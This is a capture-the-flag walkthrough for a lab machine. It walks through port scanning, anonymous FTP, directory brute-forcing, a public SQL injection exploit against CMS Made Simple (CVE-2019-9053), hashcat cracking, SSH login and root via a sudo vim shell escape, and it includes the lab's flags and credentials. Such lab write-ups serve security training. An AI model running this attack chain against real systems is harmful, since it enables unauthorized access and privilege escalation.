#Step 1
- How many services are running under port 1000?
- Run nmap -A {target IP}
- results in: 2 ports under 1000 and 1 port over 1000 -21/tcp open ftp vsftpd 3.0.3 *note-ftp-anon:Anonymous FTP login allowed -80/tcp open http Apache httpd 2.4.18 -2222/tcp open ssh Openssh 7.2p2
#Step 2
- CLI - ftp {target}
- ({target}:root): Anonymous
- use: ftp> ls
- you will see: drxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
- pub is a directory
- use: cd /pub
- you will see: -rw-r--r-- 1ftp ftp 166 Aug 17 2019 ForMitch.txt
- use: get ForMitch.txt -the file will be sent to your directory
- use: ftp> exit to exit the ftp you signed into
- You will be back at YOUR root
- type ls
- you will see: ForMitch.txt in your files
- type cat ForMitch.txt
- you will see: Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
- ({target}:root): Anonymous
#Step 3
- Open Firefox
- Type in the {target IP} in the URL
- you can add /robots.txt to see if there is anything else too look at
#Step 4
- Use gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://{target IP} - you will have the result: /simple (Status: 301)
#Step 5
- Reopen Firefox and use the {target IP} and add /simple at the end of it in the URL
- You will see CMS made simple, if you go to the bottom of the page, you will see version 2.2.8
- Open another tab in firefox and look up: exploitdb
- open google exploit Database and put CMS made simple 2.2 in the search box
- you will not find CMS Made Simple 2.2.8, but you will find CMS Made Simple <2.2.10-SQL injection
- Click on the hyperlink with CMS Made Simple <2.2.10-SQL injection
- you will find: CVE-2019-9053
- click the download button and recieve the file 46635.py
- NOTE: do not download more than one file copy of 46635.py or it will not work #Step 6
- Open your terminal and type in Python2 46635.py -u http://{target IP}/simple/
-
If it does not work you may need to install request
- curl -O https://bootstrap.pypa.io/pip/2.7/get-pip.py
- python2 get-pip.py then:
- python2 -m pip install --upgrade setuptools then:
- python2 -m pip install termcolor
-
If you need to put the syntax in again 'python2 46635.py -u http://{targeIP}/simple/' (without the ''), please run it again. You will start to see the formation of a Salt for password, Username, Email, and a password:
- Salt for Password found: 1dac0d92e9fa6bb2
- Username found: mitch
- Email found: admin@admin.com
- Password found: 0c01f4468bd75d7a84c7eb73846e8d96
-
#Step 7 (use sudo su to become root, normal user doesn't seem to work) - hashcat your findings - hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt - you will recieve 0c01f4468bd75d7a84c7eb73846e8d96:secret - the password is: secret
#Step 8 - log into ssh mitch@{targetID} -p 2222 - password is: secret
#Step 9 - type: ls and find user.txt - cat user.txt - Recover G00d j0b, keep up!
#Step 10 - type: ls /home to return to home directory under Mitch's account - you will see two options 'mitch' and 'sunbath'
#Step 11 - type sudo -l (-l is for list) - you will see (root) NOPASSWD: /usr/bin/vim -vim is your next answer
#Step 12 - go to firefox and type GTFOBins in the URL - in the sub sections you will see: 'Vim' 'For Windows' 'Base64' 'Python' etc - select Vim - copy the vim -c ':!/bin/sh', then click on the bubble with Sudo - you will see (a) sudo vim -c ':!/bin/sh' - copy that syntax and paste it into your terminal under mitch's machine - this makes you root - next to the (#) type: whoami - you will see: root - type: ls /root - you will see: root.txt -cd /root - you will see: root.txt - cat root.txt -W3ll d0n3. You made it!